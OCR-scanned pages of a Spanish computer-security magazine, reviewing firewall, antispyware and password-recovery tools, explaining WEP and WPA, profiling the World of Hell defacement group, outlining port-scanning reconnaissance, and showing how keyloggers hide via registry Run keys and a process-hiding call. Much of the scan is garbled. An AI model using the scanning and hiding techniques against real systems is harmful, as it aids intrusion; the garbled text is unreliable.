grama es configurarlo. Si lo 
hacemos bien, este pequeño 
ejecutable nos protegerá de 
los mayores pelmazos de la 
red, pero si no lo hacemos 
bien, en lugar de ello, Spam- 
Pal puede considerar basura 
mensajes que realmente 
queremos leer, como la ha- 
bitual Natasha que se pirra 
por nosotros, 


hos esteganografía es una téc- 


nica verdaderamente intere- 


sante, por cuanto hay aún algu- 


3 . ps Frames rn E 


Me más rico en funciones, 
pero gratuito sólo durante 
los primeros 60 días, es Email Ex- 
press. La versión Pro, aparecida 
no hace mucho, es altamente 
configurable y puede satisfacer 
las exigencias de la mayor parte 


nos límites que superar. 
El programa Cloak 6.0 
está disponible en versión 
demo en el sitio 
http://www.insight-con- 
cepts.com/. Si bien su 
funcionamiento es idénti- 
co a otros muchos pro- 
gramas, Cloak tiene un 
aspecto extremadamente 
cuidado y también el sitio 
parece decididamente bien he- 
cho. Los estetas del cifrado 


también saben elegir. 


laa, 
Y 


de los usuarios de la 

J Red. Ningún progra- 
ma antispam es infali- 
ble, pero este funciona 
francamente bien. La 
llista de spammer se 
actualiza con frecuen- 


mail Express 
Professional 


A cia y se pueden modi- 


ficar fácilmente incluso 

a mano. El sitio de Pri- 
vacy Labs, bien organizado y 
bastante veloz, está en la direc- 
ción http://www,privacylabs.net, 
Hagamos una visita aunque no 
nos interese Email Express, pues 
hay un par de programas free- 
ware que merecen la descarga. 


y 


A Facaives Sue 


DEL BUEN HACKER: 


LA CABEZA 5, 
EY 


blema de que, no se 
entiende por qué, si 
una americana que 
se pirra por nosotros 
quiere que 
vayamos a 


ha n fire- 

, wall 

de software es- 

j tá pensado para 


mantener alejados de nues- 
tro equipo a la mayor parte de 
pelmazos que se pasean por 
Internet. Tiny Personal Firewall 
siempre ha sido gratis, pero a 
partir de la versión 4.5 ha he- 


cho como tantos otros: se pue: 
de probar durante 30 días : 
luego es preciso comprarla 
Aunque este cambio sea mo: 
lesto, comprendemos a la gen 
te de Tiny software, en el sitic 
http://www.tinysoftware.com/ 
Se trata de un programa exce: 
lente y robusto, y tienen dere 
cho a sobrevivir. 


3 Mera, $ hrres H 


4 
5d Move. Motorola phone plus meney back F1132/20/... 78D 
Md Suzan.. Extended Car Warranty, BEST pri 1112/20)... BND 
JA Barba. curb your food cravings with the .. 1112/20)... 518 
y M harn_,. Mee to meet you! 12/20). 308 
> MA Mor Thanks: Mendthiy Lilestyles MD 6. F0112/20)... 16KB 
ys $] 'esh Out of School and ready lo F11 12/20)... 318 
5 scan 4 Best Prices kar FA 12/20/58 
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GD Cenpiart Lars 
D) 15P Response 


O Quersatine 


TEMITA 


eloz, simple, práctico y has- 
ta barato. Se llama Nucem 
2.0 y muchos de nosotros lo he- 
mos probado con una cierta sa- 
tisfacción. Siempre existe el pro- 


Do you want to allow Firewall Leak Testing Utility to 
access the Intemet? 


Technical Information 


Destination IP: 204.1,226.226:HTTP 
Application: winwotd. exe 
Version: 1.2 


More Information Available 


This program has previously accessed the Internet 


AlertAdvisor [_ ore info] 


Eemember this answer the next time | use this 
program 


one Alarm es el cortafuegos 
más famoso y uno de los más 
seguros. Muchos lo usan con sa- 


ver su sitio de 
pago, Nucem 
2.0 la blo- 
quea de in- 
mediato, pe- 
Hl-ro por lo de- 

más el pro- 
grama no está mal. 
El sitio para descar- 


gar la demo es 
http://www.helpme- 
soft.com/. 


tisfacción desde hace años y se 
gratis 


puede descargar 
http://www.zonelabs.com. 


protección ofrecida por la ver- 
sión básica es aceptable, pero la 


E" el sitio http://soho.sygate 
.com/ podemos, y debemos, 
descargar uno de los mejores pro- 
gramas cortafuegos en circulación. 
Tenemos que hacerlo no sólo por- 
que protege nuestro equipo e impi- 
de que un cracker se pasee como 
Pedro por su casa por nuestros re- 
cursos, sino que además Sygate 
ofrece su cortafuegos gratis para 
un uso personal. El cortafuegos de 
Sygate es de los pocos, junto con 
Zone Alarm, que ha sido capaz de 
no dejarse engañar por LeakTest, 
un genial ejecutable del que habla- 
mos más adelante y que ha puesto 


de 
La 


KA 5pyBot Search A Destroy 
Be Language Help 
Spybot-StD _ 


Sellimgs 


Uso at your own risk) 


de rodillas a Blacklce y otros cono-" 
cidos cortafuegos. 


P Ende DLL, abria 
P Ende ar MAC spot 
E Enalie 05 Ingea Mesa ndro 


PP Erutle tuáli mee tamy (7 Ena diva lol portan 


E Ent actora erp las 0 second 


4 Irena ¡tad 


2 sl mado pu comas ler 
ae bed rc bold pora 
Seculy Sian Marnl 


P Ende sant CCP 


de la versión Pro es excelente, 
con la posibilidad de regular di- 
versos parámetros y permitir 
operaciones y programas uno 
por uno. Zone Labs también pro- 
duce uno de los instrumentos 
más elogiados por muchos 
usuarios: Steganos Security Suite 
4. Si tienes algo que ocultar, es- 
te programa es para ti. 


7] [E Malware. sbi 
E 


7 BS 
MAT 
O [A System Iintemads 
[2] [Bl Usage Tracking 
E A Tracks. uti 


Excludes 
Iooks 
Qnine 

Irdo £ License 


Program started 


a esteganografía es una 

técnica verdaderamente 
interesante, por cuanto hay 
aún algunos límites que su- 
perar. El programa Cloak 
6.0 está disponible en ver- 
sión demo en el sitio http: 
//www.insight-concepts 


.hackertjournal.co 


US UB Seuriensme SA Descriplion Checa 
¡languege | 2] E Spybot - Search £ Destroy Integreated search for spybcte EE 
me Al | E [8 Dioler.sbi Rlomoves expensivo dales: pAJ 
E E LN E A Hackers sti Sessches for buoweer start page changers 136 
Settings yl [7] [Bl Keyloggers. sbi Removes keylogger: 407 


Removes mabcious software 10 
Fox security leaks , 


Removes spying and advedisement soltware 1297 
Sesches lor ticjan 
Integrated search for 1 inconttencies 1 
Integresated sesich lor usage tracks 2 
Search lor usage tracks Es) 


.com/. Si bien su funciona: 
miento es idéntico a otros 
muchos programas, Cloak 
tiene un aspecto muy cuida: 
do y también el sitio parece 
decididamente bien hecho. 
Los estetas del cifrado tam- 
bién saben elegir. 


/ 


de se 
navega 


Dor Internet, siempre existe el 


riesgo de meterse en algún sitio 
que se ha vendido el alma al dia- 
blo a cambio de miles de venta- 
nas que se precipitan en el moni- 


odioso. Podemos descargar Po- 
pup Zero Pro en http://www. 
pessafe.com/ y usarlo durante un 
mes. Luego tenemos que pagar 
algo menos de 20 dólares por la 
licencia. Del 

mismo sitio po- e 


Sí 

tor de cada visitante. Si no nos sa- demos descar- 3 

tisfacen los popups, contar con gar también TA =$ 7 
este programa puede mejorar Tracks Eraser ; o. | se meten en el PC, hasta la 
nuestra calidad de vida. Las ven- XP, práctico pr Professional, que cuesta casi 
tanas que aparecen de la nada se para borrar el zan e 40 dólares pero que bloquea 
terminan, y conservamos sólo los rastro que de- >). z a también los popup, los intentos 
sitios que nos interesan a salvo de ¡amos al nave- E ae — ——— de desviar al navegador du- 
un sistema publicitario invasivo y gar por la Red. ROTTTERETATE canvas» rante la navegación y las áre- 


| programa más famoso y uti- 

lizado para quitar de en medio 
spyware y otras fastidiosos anima- 
lejos tiene un nombre: Ad-Aware. 
Las versiones que se pueden des- 
cargar de http://www.lavasoft.de/ 
van de la gratuita, que busca y 
elimina los programas espía que 


Res una contrase- 
ña puede ser en oca- 
siones dramático, y cuanto más 
nos esforcemos en escribir algo 
difícil de adivinar, más duro se- 
rá recordar qué maldita combi- 
nación hemos elegido. Password 
Recovery XP, de ¡Opus, casi im- 


ner en http://www.iopus.com y, 
en el mismo sitio, encontramos 
también el hemano menor (y 
gratuito) de Password Recovery: 
123 Write All Stored Passwords 
(WASP) V2.01. Este pequeño 
programa permite recuperar rá- 
pidamente todas las contraseñas 


presiona: extrae las contraseñas guardadas 
de Windows como si estuvieran en el archi- 
guardadas en un archivo de tex- vo de Win- 
to... El programa se puede obte- dows. 


ORTO EAS | 


pos quienes cuentan con 
algo de dinero para gas- 
tar (bien) o tal vez cuentan 
con una pequeña fortuna y 
prefieren tener "sólo software 
original", 
que consideren la adquisi- 
ción de Tiger Suite 4.0 (169 
$1). Es una verdadera acu- 
mulación de programas que 
funcionan bastante bien y proporcionan de una sola vez 
todo lo necesario para analizar y mejorar la seguridad 
del propio sistema y de la red, Tiene tantas funciones que 
no podemos listarlas aquí por problemas de espacio, pe- 
ro puedes encontrarlas en el sitio www.tigertools.net. 


recomendamos 


Un programa que se vanagloria 
de eludir el 90% de las con- 
traseñas de protección de archi- 
vos zipeados en 60 minutos es 
más bien apetitoso, y si luego 
cumple lo prometido, pues mejor. 
Descárgalo desde  http:// 
www.zipcure.com/ y empieza 
inmediatamente a ponerlo a 
prueba con tus contraseñas: 
verás cosas interesantes. El pro- 
grama se puede probar durante 
un mes y luego es preciso pagar 
unos 30 dólares por la licencia. 


.hacker-journalcom Mae, 


as de memoria que contienen da- 
tos sensibles. Todo aquél que usa 
el equipo con cierta seriedad ha 
instalado al menos la versión fre- 
eware, porque ser espiado por 
desconocidos es una de las cosas 
menos divertidas que se pueden 
hacer en la Red. 


P Visual zip password recovery processor 4.21 MultiComputar 
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Anelyuirg Fe rene yy a 


eruplal tal como ha a do concebido, 


WEP da bastante asco. Su clave de 


cifrado tiene dos posibles modos, a 

64bits y a 128 bits. En realidad 24 bits 
están siempre reservados al llamado 
vector de iniciación y así para la cla- 
ve están disponibles sólo 40 y 104 bits 


respectivamente. Son valores que 


iban bien hace unos años, pero hoy 
día ya no, dado que las señales wire- 
less las puede captar cualquiera. Con 
tal que se encuentre en la zona justa, 
con una buena antena, un malinten- 
cionado puede interceptar las seña- 
les de llegada y, con un poco de suer- 


[funkinto| Configurar! Encuplon > | 


El olivo es 


te, conseguir descifrarlo todo en unas 
horas. Para quien vive en el campo no 
hay problema, pero en un comunidad 
de vecinos de una poblada ciudad no 
es improbable que un vecino listillo 
descubra que en el piso de al lado se 
usa una conexión wireless e intente 


aprovecharse de ella a costa de otro. 


No hay una cifra de cuántas estacio- 


“Your encryption seltings must match those of your network, 


or your computer will be unable to communicate. 
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Apply 


nes wireless están fun- 
cionando sin password o 
con uno idiota del tipo 
1234 o nombreapellidos. 


sn. Hablando en 


serio, será la fortuna de muchas 
empresas, siempre y cuando tengan 
un administrador de red capaz de 
usarlo. Las armas secretas de WPA 
son el sistema de cifrado de datos 
Temporal Key Integrity Protocol 
(TKIP) y el protocolo de autenticación 
Extensible Authentication Protocol 
(EAP). 

El sistema funciona de dos maneras, 
una para las empresas y otra para las 
instalaciones individuales, como las 
domésticas. En el sistema empresa- 
rial se utilizan un servidor de red y 
sofisticados mecanismos de autenti- 
ficación para distribuir a los usuarios 
claves de cifrado especiales, llama- 
das claves master. En la casa de uno, 
en cambio, si no hay servidores de 
red WPA funciona en modo PSK 
(Preshared Key), que permite introdu- 
cir manualmente las claves de cifra- 
do. En la práctica no cambia mucho, 
se escribe el password de la estación 
y WPA se ocupa del resto. Pero el 
cifrado resultante es mucho más efi- 


E 


¡ en el 2003 se vendieron en todo el mun- | 
do aparatos wireless Wi-Fi por valor de 
siete mil millones de dólares, desde ahora 


hasta el 2008 se venderán 44.000 millones 
de dólares, unos 35.000 millones de-euros. 

ÍA groso modo, se podrían comprar con ello 
mil jugadores de la Champions League, 
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caz, gracias sobre todo al 

“sistema TKIP, que com- 
prende varias funciones 
entre las cuales está el 
cambio periódico de las cla- ' 
ves de cifrado, que dificulta 
mucho más que WEP el trabajo 
de escucha y de descifrado por par- 
te de los agresores externos a la red. 
De hecho, la clave master queda está- 
tica y siempre igual en WEP, mientras 
en WPA representa sólo el punto de 
partida de la generación de claves 
diversas, que van cambiando y no se 
utilizan nunca dos veces. 


WPA todavía no se ha aprobado defini- 
tivamente. El Task Group | (Security) del 
IEEE ha hecho un borrador provisional 


del estándar, que debería ser oficial a 
mitad de año. Puesto que las especifi- 
caciones provisionales no serán muy 


diferentes de las finales, algunas empre- 


sas ya han empezado a producir apara- 
tos wireless compatibles con WPA. 
Microsoft y Apple soportan ya WPA en 
sus sistemas operativos más recientes 
(MS con un parche de XP), y también se 
puede utilizar con Linux. Pero hay que 
estar atentos, puesto que al ser provi- 
sional existe el riesgo de que el sistema 
tenga todavía fallos y que los aparatos 
que se compran no sean tan seguros 
como los que saldrán al mercado cuan- 
do se lance la versión definitiva de WPA, 


m QUE ES EL IEEE 

l Institute of Electrical and Electronics 

Engineers (IEEE) existe desde hace más 
de un siglo y se ocupa de muchas cosas, 
entre las cuales está definir estándares, 
como se puede ver en la dirección 
http://standards.ieee.org/. IEEE 802.11, por 
ejemplo, es la sigla que comprende los 
estándares de red wireless. 


m NO NOS DEJEMOS 
TOMAR EL PELO 


PA, en otras palabras IEEE 802.11 i, 

que representará la nueva genera- 
ción de la seguridad WiFi, está todavía en 
fase de perfeccionamiento, Así pues, quien 
compra ahora un producto wireless tiene 
que fijarse en las especificaciones. Es 
importante que el aparato se pueda actua- 
lizar en el momento en que esté disponi- 
ble la versión más avanzada del estándar. 


m MÁS SEGUROS 
MENOS USUARIOS 


n muchos sistemas wireless la mayor 

seguridad dada por el sistema WPA se 
obtiene a costa de reducir el número máxi- 
mo de personas conectadas. En la mayoría 
de los casos no tiene importancia, pero en 
grandes redes muy concurridas podrán cre- 
arse problemas. 


Una visita inesperada y tu vida cambia, como cambian 
las cosas en este mundo infernal: se trata de 


emphis, martes 27 
de. noviembre de 
2001, a las 17: el 
corazón quinceañe- 
ro de Cowhead2000 late a toda 
pastilla, tiene la sensación de 
estar a punto de desmayarse. 
Delante de la puerta de su casa hay un 
puñado de agentes federales, su madre 
está pálida y las tajetas de identificación 
se agitan amenazadoras. Dos. meses 
después del ataque a las torres geme- 
las mamá Cowhead se da cuenta de 
repente de que su hijo, su niño que está 
siempre pegado a la pantalla del orde- 
nador, está buscado por grupos antite- 
rroristas de medio mundo, Hacía algu- 
nos meses Cowhead había fundado 
World of Hell, un grupo hacker formado 
por miembros totalmente desconocidos 
entre ellos, El reclutamiento se hacía por 
vía email, mediante IRC, siempre con 
nicknames que cambiaban a la misma 
velocidad con la que los agentes inten- 
taban interceptarlos. 

Los federales lo tranquilizaron en segui- 
da, No estaban allí para arrestarlo, sino 
para aclarar algunos puntos, ¿Cuáles? 


Owned by spyROcker 


| spyRocker,| Ra Fa | dawygy,r00t,Fona Tone and KrOn | 
Vie still in Unttad of WOM 


supporta |! UGCIA 


Se dice pronto. Entre los miembros del 
grupo había un tal Ra_Fa, que a su vez 
era el fundador de otra galaxia de hac- 
kers, decididamente más feroz. Entre sus 
ataques, siguiendo teorías más o menos 
patrióticas había una serie de tentativas 
de derribar las redes IP afganas y pales- 


mn A 


World.of. Hell 


tinas. Y no sólo esto, además se jacta- 
ban, gracias a periodistas ávidos de una 
exclusiva de tercera, de poder lanzar ata- 
ques hasta a las redes secretas de Al- 
Qaeda, Y de poderlo hacer porque tení- 
an más de mil ordenadores por todo el 
mundo, a punto para obedecer sus órde- 
nes telemáticas en cualquier momento. 
El FBI decidió que ya era suficiente y que 
querían saber más sobre el tema. 

La visita al adolescente Cowhead2000 
era pues de tanteo, lo que querían era 
saber si se trataba de fanfarronadas de 
chavales fanáticos de la tecnología o de 
terroristas reales, potencialmente muy 
peligrosos en ciernes. 


Según las notas de los 
agentes federales 
"Cowhead2000 tenía en 
su casa no una 
habitación, sino un 
verdadero laboratorio 
súper equipado" 
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El cuarto del quinceañero era 
en realidad un laboratorio equi- 
pado de miedo, con cinco orde- 
nadores con todos los sistemas 
operativos existentes. No hace 
falta decir que contaba con una 
conexión ultrarrápida a Internet, 
Lo que Cowhead2000 tenía en 
casa no era una habitación, sino 
un concentrado de tecnología. 
Todo ello reflejaba tanto su 
pasión como su preparación 
informática y una capacidad 
destructiva impresionantes. 

El grupo World of Hell fue crea- 
do en marzo del 2001, El método de 
reclutamiento era totalmente profesional, 
se atacaba un sitio y se dejaba un men- 
saje del tipo: "se buscan verdaderos pro- 
gramadores, no lamers, no newbies”, Se 
podía permanecer en el grupo sólo si no 
pasaban más de unas pocas semanas 
entre un ataque exitoso y otro. Así World 
of Hell se dio a conocer rápidamente por 
violaciones a sitios como el del Ministe- 
rio de Educación de Hong Kong, el de 
Sony Semiconductor Foundry Service, o 
a sitios del tipo del de los servicios de 
banda ancha de Time Warner. 

Pero era sólo el principio. Se impuso 
cuando dejó con la boca abierta a los 
responsables gubernamentales mexica- 
nos y rusos porque centenares de sus 
sitios web habían "fallecido" bajo la pre- 
sión de ataques masivos firmados por 
WohH, sus siglas. : 

La ética que inspiraba estos ataques 
era la visión negativa del mundo que 
les rodeaba que tenía el grupo: "un 
mundo de infierno", El espacio digital 
era al mismo tiempo un modo de rei- 
vindicar todos los aspectos más crudos 
de la realidad en forma de hacking. 


7A 


Todos eran altamente especializados 
y, aunque no se hubiesen visto nunca 
cara a cara, se fiaban los unos de los 
otros, llegando a un altísimo grado de 
confianza. Uno de los miembros dice 
que este factor era el elemento esencial 
para conseguir los ataques. Entrar en 
World of Hell era como haber supera- 
do un examen de "verdadero hacker". 


Una galaxia de 
atacantes 


Entre los varios miembros, RaFa, 
FonE _TonE y dawgyg eran los 
más peligrosos. Tenían contactos 


questions, comente? fuck yo 
(UA 


oscuros (se cree que directamente con 
Al-Qaeda, pero no es seguro). El FBI 
abrió un dossier, 


En abril de 2001 se 
contaron más de 
cien ataques 


El divertimento era similar a un hacking 
de diversión, se entraba ¡legalmente en 


los sistemas, pero no se creaban casi 


nunca daños irreversibles. Sólo se cam- 
biaba la home page de la víctima y se 
substituía con algún mensaje moral o 
reflexión sobre la sociedad. 

RaFa era el elemento más destacado, o 
al menos el que se atribuía más intrusio- 
nes y más especiales. Odiaba el siste- 
ma y luchaba por cambiarlo, atacaba los 
sitios y dejaba su huella con ásperas crí- 
ticas. Pero las incursiones más graves 
las había llevado a cabo FonE_TonE. 
Hacker desde los 11 años, había reco- 


pilado un ingente material en manuales, 
scripts y herramientas, y los había estu- 
diado morbosamente. Aún se jacta de 
numerosas publicaciones y guías de hac- 
king, pero nosotros lo recordamos por 
su actividad. Antes de World of Hell, que 
limitó un poco su "cyber violencia", fue 
un elemento destacado de rOOt-access, 
otro grupo hacker de aquel periodo. Su 
lema era: "me gusta descubrir cosas nue- 
vas, entender qué es lo que puedo hacer 
y qué es lo que no puedo hacer", 


FonE_TonE era hacker 
desde los 11 años, estu- 
diando morbosamente 
una cantidad impresio- 
nante de manuales 


El problema era que aunque sabía qué 
era lo que no podía hacer, lo hacía de 
todos modos. No se puede definir un 
cracker, pero causó muchos daños. 
Como cuando en julio violó al mismo 
tiempo dos sitios, uno era el de Prostar 
Interactive Media Works (http://www,mini- 
cat.com/), al que enganchó una página 
con un caballero negro con una arma- 
dura de metal, sobre un fondo de rayos, 
dejando una dirección electrónica para 
que los administradores del sistema se 
pusieran en contacto con él, 


Otro miembro enfadado con el 
sistema era KrOn; concretamen- 
te se ensañaba contra el mundo 
de la escuela, que -según decía 
él- no saciaba su curiosidad mor- 
bosa por el desafío digital. Y le 
creemos. Hacker experto, jugaba a fút- 
bol y salía con amigos como todos sus 
coetáneos, pero en cuanto se ponía fren- 
te al ordenador, cambiaba de rostro, Par- 
ticipó en el periodo de oro de World of 
Hell. Era el más ligado a la verdadera 
ética hacker, "No puedes parar de ser un 
hacker, es un estado mental", es la'fra- 


h 119 yw nacitridurnal.com 


se más repetida en sus mensajes-entre- 
vista. Sus técnicas eran las más origina- 
les, y era la punta de diamante de los 
sistemas Unix, KrOn viola un sitio sólo 
si tiene algo que comunicar. De todos 
modos, después del "agujero" advierte 
siempre al administrador víctima. 


El fin 


Después de la visita del FBI 
Cowhead2000 se escondió... y 
World of Hell cambió su estruc- 
tura. RaFa, FonE_TonE e dawgyg 
abandonaron el grupo, posiblemente 
también asustados por las posibles con» 
secuencias. Los sustitutos no estaban 
para nada a la altura, En diciembre de 
2001 le tocó a Cowhead2000. Posible- 
mente asustado, dejó su puesto de líder 
de WoH. Se cerraba una era. Cowhe- 
ad2000 se sentía defraudado por las 
degeneraciones políticas de RaFa y de 
dawgyg y no veía en los otros miembros 
el espíritu originario con el que había fun» 
dado el grupo hacker. World of Hell se 
había puesto el ambicioso objetivo de 
cambiar el mundo de los crackers, 
"moralizarlos", llevarlos por la vía de la 
curiosidad hackerística "pura y sin 
daños", pero no lo consiguió. Conclusión: 
mejor dejar el puesto a otro. Cowhe- 
ad2000 todavía está presente si lo bus- 
cáis. Su actividad moralizante no quiere 
cesar, aunque, a pesar de los esfuerzos, 
este sigue siendo "un mundo infernal", 
Y el FBI ha abandonado la presa, o esto 
es lo que parece... 


En el absurdo caso que fuésemos hackers y quisiéramos entrar en un sitio para 
demostrar que no es tan imposible de atacar, tal como dice su admin, antes 
que nada tendremos que ver claro el escenario frente al que nos encontraría- 
mos en el momento del ataque. 


l escenario consiste, evidentemen- 
de te, en el sistema operativo y en los 
servicios utilizados por aquel ser- 
vidor, en concreto donde se encuentran 
las páginas que queremos atacar. 
¿Pero, cómo se puede obtener toda 


El NetRecon es uno de los instrumen- 
tos de escaneo más completos. 


esta información? Hoy día existen infi- 
nidad de recursos para recopilar cuan- 
ta más información posible acerca de 
los diferentes servidores. Este es sin 
duda el momento crítico de cualquier 
ataque, basta pensar los report de defa- 
cement famosos que demostraban que 
a menudo detrás de una acción de 
30/60 segundos como máximo, había 
semanas, si no meses, de búsquedas 
repetidas e incesantes. 

El escaneo de puntos débiles se utili- 
za ya desde hace muchos años, pero 
se basa siempre en el mismo concep- 


to, es decir, en interrogar el máximo 
número de puertos posible para con- 
trolar cuáles de ellos están abiertos y 
vulnerables a posibles ataques. 
Veamos a grandes líneas cuáles son 
los pasos clave para obtener lo que 
necesitamos. 


El whois 


Buscar en una determinada red de 
Internet puede resultar bastante difícil 
por la enorme cantidad de redes que 
puede contener, Para ello tenemos la 
ayuda de un instrumento muy fácil de 
utilizar: el whois. Es un servicio de Inter- 
net que, dada una específica cuenta en 
un dominio, permite recoger mucha 
información como URL o usuarios 
conectados a él. InterNIC es uno de los 
entes más destacados por este tipo de 
aplicación, ya que es el 
órgano delegado para la 
atribución de nombres 
de dominio y de direc- hesmosta des 
ciones |P. Desde el Sta den 
momento en que tengo 
un dominio y una URL Paquetes? 09 
tengo que utilizar otro 

instrumento que me per- 
mita descubrir el forma- 
to alfanumérico mnemó- 
nico de la dirección IP 
asociada y, en un 
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segundo momento, controlar que efec- 
tivamente aquella IP está activa cuan- 
do planeo el ataque. Para llevar a cabo 
estas dos operaciones utilizo un único 
servicio, conocido con el nombre de 
PING. No es otra cosa que el envío de 
una petición ICMP de tipo eco a la cual 
el ordenador remoto responde con un 
paquete de tipo PONG, que contiene, 
entre otras cosas, también la dirección 
IP del mismo PC, 


Ataques Social 
engeneering 


La ingeniería social ha sido, desde los 
inicios de la cultura hacker, el método 
más utilizado para hacerse con infor- 
mación. Se basa fundamentalmente en 
las capacidades personales de hacer- 
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Haciendo PING de un dominio se recibe la IP 
correspondiente y otros datos interesantes. 


se creíble frente a terceros, y aprove- 
charse de la confianza adquirida en el 
tiempo para obtener privilegios o para 
"robar" elementos útiles para el ataque, 
Seguro que habréis recibido algún 
email proveniente de cuentas ficticias 
del tipo asistenciaMproveedor.es que 
os piden el password de vuestro correo 
electrónico ¡para poner al día los archi- 
vos! Típico ejemplo de ataque social 
en el que el atacante simula ser un téc- 
nico. Leyendo estas líneas pensaréis 
que nadie puede caer en una trampa 
como ésta; en cambio, ¡la cantidad de 
personas que responden es de entre 
un 20 y un 30%! 


Ataques scanning 


Los ataques de tipo scanning, por lo 
contrario, se basan puramente en la 
técnica, o mejor, en pura tecnología. 
Se utilizan instrumentos cuyo principio 
de funcionamiento está en enviar 
paquetes a determinados puertos y ver 
cuáles son receptivos. Hay muchas 
variantes de esta técnica: 

* Escaneo de puertos TCP: se enví- 
an paquetes y se intenta establecer una 
comunicación con aquel puerto en con- 
creto, Es el método más simple y el 
más utilizado, 

* Escaneo de puertos TCP por frag- 


Se puede ver la complejidad de las 
opciones que permiten escaneos de 
varios tipos. 


mentación: es la misma técnica con la 
diferencia que el header TCP se divide 
en paquetes más pequeños, de modo 
que los filtros de protección no consi- 
guen detectar el ataque, 

Escaneo SYN TCP: se basa en el 
envío de un paquete SYN como para 
abrir una conexión, si el PC responde 
con una petición SYN/ACK, nuestro 
programa manda inmediatamente una 
respuesta RST y cierra así el proceso. 
lene la ventaja de ser casi invisible y 
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la desventaja de ser mucho más lento 
que el anterior. 


+ Escaneo TCP FIN: técnica todavía 
poco refinada que se basa en el princi- 
pio que a menudo los puertos abiertos 
que reciben paquetes FIN responden 
con paquetes RST haciéndose asi 
reconocer, 

+ Escaneo UDP ICMP: como sabemos 
el protocolo UDP no prevé intercambio 
de paquetes ACK o RST, pero la mayo- 
ría de hosts si recibe un paquete dirigi- 
do a un puerto UDP cerrado responde 
con un mensaje de error y por exclusión 
se llega a los puertos abiertos. 


El Software 


Son muchísimos los programas de tipo 
scanner que se pueden encontrar en 
Internet, casi todos válidos y todos 
basados en el mismo principio de fun- 
cionamiento, 

» Nai CyberCop: funciona tanto con 
Linux como con Windows, valora los 
puntos débiles de un sistema hacien- 
do un escaneo. Consigue incluso ana- 
lizar problemas de seguridad ligados a 
servidores y hubs. Integra además una 
función mediante la cual se pone al día 
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Abajo se ven los puertos abiertos y los 
servicios accesibles en remoto. 


a través de Internet descargando la 
base de datos de los puntos débiles. 

* Jackal: es un scanner Stealth 
(escondido) basado en el principio de 
funcionamiento del tipo SYN TCP, 

* Nmap (www.insecure.org/nmap): un 
escáner muy completo que tiene la 
posibilidad de trabajar de diferentes 
maneras según sea la situación, A 
veces utiliza métodos invisibles, a 
veces métodos rápidos, Incorpora los 
principales métodos de escaneo. 

- Tiger suite (www.tigertools.net): está 
considerado el mejor instrumento para 
la seguridad de las comunicaciones 
entre redes. Su velocidad no tiene para- 
gón con otros escáneres y, además, es 
el único que integra también las 
siguientes características: network dis- 
covery (identifica y hace un listado de 
todos los puntos débiles de una red), 
local analyzer (escanea el sistema local 
detectando entre otras cosas virus, tro- 
yanos y spyware), attack tools (un con- 
junto de instrumentos que comprueban 
la seguridad de un sistema simulando 
ataques de diferente naturaleza). ¿Un 
defecto? Cuesta 69 dólares, 


a] 
Send Script 


Target Address or Hostname: |www.tigertools net CON 
Ejemplo de penetración utilizan- 
do la herramienta TigerSuite. 


Una vez efectuado el escaneo tendre- 
mos vigilados una serie de puertos 
abiertos. Ahora nuestra técnica y nues- 
tra fantasía deben deducir cómo y qué 
utilizar para sacar el mayor provecho a 
estos recursos, Si hemos llevado a 
cabo un escaneo en nuestro servidor 
para controlar su seguridad, tenemos 
que recordar que nunca un ordenador 
conectado a Internet, por definición, 
puede ser seguro al 100%, Nuestra 
destreza está en estar al día sobre las 
últimas técnicas de protección y en el 
ponerlas en práctica buscando levan- 
tar lo más altos posible los muros que 
rodean nuestra "ciudad", lá 


CÓMO AISLAR PROGRAMAS MALICIOSOS EN TU PROPIO EQUIPO 


CLANDESTINOS 
A BOnADO 


Programas como los caballos de Troya o los key- 
loggers a menudo se esconden en el sistema 
infectado y no se borran fácilmente con las utili- 
dades más comunes: he aquí cómo descubrirlos. 


omo hemos visto en los números pasados, los key- 
loggers pueden resultar ser potentes instrumentos 
a disposición de los crackers y lamers de todo tipo, 
ya que son muy fáciles de instalar y configurar. 
Por esto es indispensable comprender sus me- 
canismos de funcionamiento para identifi- 
car su eventual presencia y proceder a una desinsta- 
lación. 
En los sistemas operativos más simples, como las versiones de 
Windows que llegan hasta la Millenium, para los programa- 
dores siempre ha sido fácil ocultar (al menos a los ojos de la 
mayoría de los usuarios) la presencia de procesos presentes 
en la memoria con estratagemas muy simples. 
Un ejemplo podría ser, usando un lenguaje de programación 
cualquiera, el siguiente código: 


RegisterServiceProcess(GetCurrentProcessld( 
), 1); 


De esta forma, el usuario que intente obtener la lista de los 


procesos activos con el Administrador de tareas 
(Ctrl. +Alt+Supr,) no vería el proceso "escondido" en la lista 
que muestra todos los programas abiertos. Una solución a tal 
inconveniente podría ser la adopción de un programa ade- 
cuado y más avanzado respecto a la lista de tareas estándar, 
como por ejemplo AVP System Watcher disponible en la di- 
rección www.avp.it/future.htm. 

Mejor aún, conviene tener confianza en sistemas operativos 
como NT/2000/XP que al menos ya bloquean de entrada es- 
tas rudimentarias técnicas de enmascaramiento. 


» Funcionalidades de keyloggers y 


backdoors 


Una vez que un backdoor se ha instalado en un ordenador, 


necesita activarse cada vez que el usuario activa su propio or- 
denador. Para obtener su objetivo, debe posicionarse 
obligatoriamente en uno de aquellos archivos que se 
leen en el momento del arranque y que son WIN.INI y 
SYSTEM.INI además del Registro de Windows. De este último, 
en particular, no hay que perder de vista algunas claves crí- 
ticas: 


HKEY_LOCAL MACHINEASoftwarelWMicrosoftYWWindows1Cu 
rrentVersioniRun 

HKEY_LOCAL MACHINE1SoftwareWMicrosoftiWindows1Cu 
rrentVersion1iRunOnce 

HKEY_LOCAL MACHINE SoftwareWMicrosoftYWWindows1Cu 
rrentVersionlRunOnceEx 

HKEY_ LOCAL MACHINEASoftwarelMicrosoftWWindows1Cu 
rrentVersionRunServices 
HKEY_LOCAL_MACHINEASoftwareWMicrosoftWWindowsYCu 
rrentVersionlRunServicesOnce 


Estas son en efecto las claves más usadas por los 
backdoors que se encuentran en la red, aunque hace falta 
prestar atención también a todas las operaciones que coti- 
dianamente cumplen los usuarios como la ejecución de pro» 
gramas y la apertura de documentos HTML; 


HKEY_CLASSES_ROOTlexefilelshelllopen1com- 
mand 


donde el valor inalterado debería ser similar a esto: 
"o ] Ye 


HKEY_CLASSES_ROOT1htmlfilelshelllopenicom- 
mand 


con valor similar a: 
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"C+WPROGRA-1NINTERN-1liexplore.exe" -nohome 


En lugar del valor %1 podría haber el recorrido de un back- 
door, que así será activada a cada ejecución del programa. 

Estas son las técnicas principales para que arranque un pro- 
grama de espionaje al iniciar, incluso 


0 Información del sistema 
Modificar Ver Herramient 
Nombre 
actotiay.exe 


alg exe 
bdss.exe 


